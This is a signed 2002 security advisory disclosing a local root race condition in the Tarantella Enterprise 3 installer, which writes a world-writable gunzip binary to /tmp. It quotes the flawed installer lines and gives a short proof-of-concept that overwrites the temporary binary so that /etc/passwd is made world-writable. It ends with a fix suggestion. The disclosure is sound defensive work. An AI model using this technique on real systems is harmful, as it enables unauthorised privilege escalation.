-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Vapid Labs Larry W. Cashdollar 1/14/2002 Vulnerability report for Tarantella Enterprise 3. 1. local root compromise during installation: The installation script provided with tarentella handles utility packages during installation insecurely. A root owned binary "gunzip" is created in /tmp with world writeable permissions, the pid is appended to the filename. TMP_GUNZIP=$TMPDIR/gunzip$$ $ ls -l /tmp/gunzip16152 - -rwxrwxrwx 1 root root 51808 Jan 14 00:15 gunzip16152 gunzip is extracted: extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE The permissions of gunzip are changed to rwx for all: chmod 777 $TMP_GUNZIP >/dev/null 2>&1 The binary is used during installation: extract $efilename | $TMP_GUNZIP -q > "$efilename" 2. Exploit: There is a race condition between when gunzip is extracted and used during installation. At which time a malicious local user could inject code to compromise the system quickly. $ echo "#!/bin/sh" > /tmp/test.sh $ echo "chmod 777 /etc/passwd" >> /tmp/test.sh $ cat /tmp/test.sh > /tmp/gunzip16152 I was able to change the permissions of /etc/passwd to 777 by performing the above as an unpriviledged user. 3. Recommendations: Perhaps create a directory in /tmp or /var/tmp and use that directory as a work place? umask 077 mkdir /tmp/workdir 4. Software: Tarantella Enterprise 3 http://www.tarantella.com/download/e3/ Tested on Linux Debian 2.2 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE8QmV21hSQ6Gxh/KoRAhYIAJ0aDduF4k/fHV1O+24W8C6uNkokIwCgp2OL gaJAw7urwOy0Ue03nEjlH2Q= =TdDa -----END PGP SIGNATURE-----
